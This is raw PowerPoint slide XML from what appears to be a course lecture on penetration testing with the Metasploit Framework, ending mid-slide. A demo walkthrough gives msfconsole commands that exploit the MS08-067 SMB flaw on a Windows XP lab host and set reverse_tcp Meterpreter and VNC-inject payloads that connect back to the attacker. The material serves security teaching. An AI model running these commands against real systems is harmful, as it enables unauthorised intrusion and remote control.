          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" altLang="zh-TW" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="3657600"/>
            <a:ext cx="7848600" cy="2671763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4716463" y="2420938"/>
            <a:ext cx="34076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latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Reconnaissance</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1" dirty="0">
              <a:latin typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272796534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Exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s a prepackaged collection of code that gets sent to a remote system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>s the weakness that allows the attacker to execute remote code (payload) on the target system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77417144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Payload</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>“additional functionality” or change in behavior that you want to accomplish on the target machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>installed on the target system once the exploit has been successfully executed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Metasploit’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t> most popular payloads include adding new users, opening backdoors, and installing new software onto a target machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2463849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Msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A menu-driven, non-GUI, text-based system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is fast, friendly, intuitive, and easy to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1956086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6" descr="Screen shot 2015-02-25 at 9.53.3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7150"/>
            <a:ext cx="9144000" cy="706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326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Screen shot 2015-02-25 at 9.55.4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88074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053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PT process</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1341438"/>
            <a:ext cx="9144000" cy="4789487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Info collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uncover a new target at 172.16.45.130</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NMap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tell you that the target is a Windows XP machine with SP3 installed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Nessus Scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find the vulnerabilities, especially with rank “high”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Drill down to high findings to reveal the source of this issue, for example missing patch MS08_067</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3580467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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1341438"/>
            <a:ext cx="9144000" cy="4789487"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Choose an Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>earch ms08_067 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After “search” command, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> found a matching exploit and provided several info of the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Name and location; “windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ms08_067_netapi”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rank; “high” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>manual; low; average; normal; good; great; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>exellent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ms08_067_netapi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1155359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130925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select a Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>how payload: list all available and compatible payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>et payload windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vncinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: select one of the payloads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We will install VNC on the target and then have that target connect back to us. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this example, we are sending an exploit to the target. If successfully executed, the exploit will call the “install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vnc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” payload and remotely install the software without any user interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>how options and set options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Launch Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3655213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descr="Screen shot 2015-02-25 at 10.03.02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78863" cy="678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903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i="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Running Metasploit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28674" name="Picture 5" descr="Screen shot 2011-03-23 at 9.28.30 PM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="35786" t="30240" r="18564" b="30344"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="1700213"/>
            <a:ext cx="8742362"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6612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Target information</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mail Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DNS Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Various machines in targets’ networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Email address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Passwords (or hints)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2244108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988"/>
            <a:ext cx="10080626" cy="791692"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" smtClean="0"/>
              <a:t> Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Demo Walkthrough</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="31750" y="765175"/>
            <a:ext cx="9144000" cy="5500688"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use exploit/windows/smb/ms08_067_netapi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set PAYLOAD windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter/reverse_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set RHOST [remote host] 192.168.11.51</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>set LHOST [local host] 192.168.11.53</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Module options (exploit/windows/smb/ms08_067_netapi):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   Name     Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   ----     ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RHOST    192.168.11.51    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>yes       The target address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   RPORT    445              yes       Set the SMB service port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>Payload options (windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   Name      Current Setting  Required  Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   ----      ---------------  --------  -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   EXITFUNC  thread           yes       Exit technique: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>seh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>, thread, none, process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
